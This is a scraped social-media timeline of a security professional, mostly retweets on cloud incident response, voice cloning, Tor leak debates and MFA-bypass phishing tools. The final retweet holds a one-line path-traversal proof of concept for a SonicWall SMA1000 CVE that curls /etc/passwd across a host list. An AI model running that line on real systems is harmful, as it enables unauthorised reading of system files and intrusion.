David Routin

1.5K posts

@Rewt_1

cyber security addicted, offensive and defensive teamer, #malware, #pentest, #DFIR, #SIEM, #SOC, #PurpleTeaming

Switzerland · Joined April 2017
152 Following · 229 Followers
David Routin retweeted
Invictus Incident Response
🚀 Introducing 𝐀𝐥𝐥-𝐈𝐧 access for Cloud Labs Most cloud security training happens in a vacuum. Real-world attacks don't. We are incredibly excited to announce the launch of our All-in level for Cloud Labs. Here is what makes this scenario unique: 🌐 Cross-Cloud Attacks: You will trace sophisticated threats that pivot across different cloud environments, mimicking the true complexity of modern, multi-layered breaches. 🛠️ Live Environment Access: You get real, hands-on access to investigate active threat scenarios directly within live Google Workspace and Google Cloud environments. It is time to test your cloud incident response skills for real! #stayInvictus #CloudIncidentResponse #CloudLabs
David Routin retweeted
Hasan Toor (@hasantoxr)
🚨BREAKING: The "Ollama for voice cloning" just dropped. It's called Voicebox and it clones any voice from just a few seconds of audio entirely on your machine. No ElevenLabs subscription. No cloud uploads. No voice data leaving your device. It's powered by Qwen3-TTS, Alibaba's breakthrough voice model. → Upload a few seconds of audio → Get a near-perfect voice clone → Generate speech in any language → Mix multi-voice conversations in a DAW-like timeline editor All running locally. Zero cloud dependency. But it's not just a TTS wrapper. It's a full voice production studio: → Multi-track timeline editor for podcasts and dialogues → System audio capture + Whisper transcription built in → Voice prompt caching for instant regeneration → Built with Tauri (Rust), not Electron 10x smaller, native performance 100% Opensource. MIT Licensed. macOS + Windows available now. Linux coming soon. This is the moment voice cloning leaves the cloud and runs on your desktop. Link in the first comment.
David Routin retweeted
Tom Dörr (@tom_doerr)
Graph-based OSINT investigation platform
David Routin (@Rewt_1)
@CraigHRowland Posting a meme and a "generic" answer cannot be a technical answer in any way. Could you provide a practical example of what you are talking about precisely and how it can lead to IP identification at the end?
Craig Rowland - Agentless Linux Security
Stopping IP and metadata leaks on a device with Tor browser alone is the proverbial bandaid on a shotgun wound. The entire device is doing nothing but spewing data that can identify you if anything goes wrong.
David Routin (@Rewt_1)

@CraigHRowland Afaik all exposures were resolved with all tor browser usage... Webrtc, dns leak, JS, external plugins... It was exactly the meaning of my question. Which technical proof remains that it can happen on a fully patched tor browser?

David Routin (@Rewt_1)
@CraigHRowland Afaik all exposures were resolved with all tor browser usage... Webrtc, dns leak, JS, external plugins... It was exactly the meaning of my question. Which technical proof remains that it can happen on a fully patched tor browser?
Craig Rowland - Agentless Linux Security
@Rewt_1 Covered in other threads. Tor/VPN leaks happen through browser/endpoint antics. The remote server and device apps can and will leak data regardless of what crypto is protecting the communications.
David Routin (@Rewt_1)
@CraigHRowland Would you mind providing real technical arguments instead of generic nonsense?
Cloud Radar (@CloudR907)
@CraigHRowland That initial hop from your computer to your ISP to the VPN router. That's all they need. After that it's all logs and time stamps. Hell, a Palo Alto firewall at the ISP could decrypt your traffic without you even knowing it. You're not safe.
David Routin retweeted
Petri Paavola | MVP (@petripaavola)
I just updated my Intune tool IntuneDeviceDetailsGUI to version 2.98 which now uses Microsoft Graph -module. Update your old version to this newest version. New requested features are Show Bitlocker Recovery Keys and LAPS Password. #MMSMOA #Intune github.com/petripaavola/I…
David Routin retweeted
IAM!ERICA (@EricaZelic)
Anyone want a cloud attack VM like Kali? We can call it Cloudy. Yes, I made one 😊
- AiTM phishing MFA Bypass
- Illicit consent phishing MFA Bypass
- CAP gap analysis for MFA avoidant activities
- Device code phishing MFA bypass
- Token abuse tools for MFA bypass
- Teams phishing
- Post-exploitation tools
- Enumeration tools
- Spray tools
Nathan McNulty (@NathanMcNulty)

@EricaZelic Which should you create? A) A user B) A group C) A device D) An application Erica: E) Malicious tenant 😈

David Routin retweeted
ZachXBT (@zachxbt)
4/ After contacting MTG sellers were where things became interesting. -buyer was spending millions on starter decks, alpha sets, sealed boxes -buyer seemed to be overpaying by 5-10% -buyer sent crypto up front and broker met up IRL with seller -buyer was unknown to seller -said the broker has limited crypto knowledge (likely does not know about Tornado) *seller names will be kept private for their safety*
David Routin retweeted
Sam ☁️🪵 (@Sam0x90)
💜Adversary Simulation and Purple friends💜 I'm happy to share this simulation plan which regroups a TOP 35 @MITREattack TTPs from 22-23. Based on open source intel, it's meant to ease the onboarding of more into Purple! Have a look at the readme #CTI #TTP github.com/Sam0x90/CTI/tr…
David Routin retweeted
IAM!ERICA (@EricaZelic)
How do you recover from a **forest compromise** in a hybrid environment with Microsoft Cloud? Assume all components of Microsoft Cloud and On-premises Active Directory are in use. We all know the right answer is nuke it from space, so wrong answers only. PLZ Repost!
David Routin retweeted
Fox-IT (@foxit)
We strongly advise everyone that has (had) a Cisco IOS XE WebUI exposed to the internet to perform a forensic triage. We published steps on identifying compromised systems on our GitHub here: github.com/fox-it/cisco-i… [3/3]
David Routin retweeted
Dirk-jan (@_dirkjan)
New blog: Phishing for Primary Refresh Tokens and Windows Hello keys. This blog describes how we can use device code phishing to obtain PRTs and in some cases even add backdoor Windows Hello keys 🤯 dirkjanm.io/phishing-for-m…
David Routin retweeted
Clandestine (@akaclandestine)
CVE-2023-0126 SonicWall SMA1000 File Read Bug POC: cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";done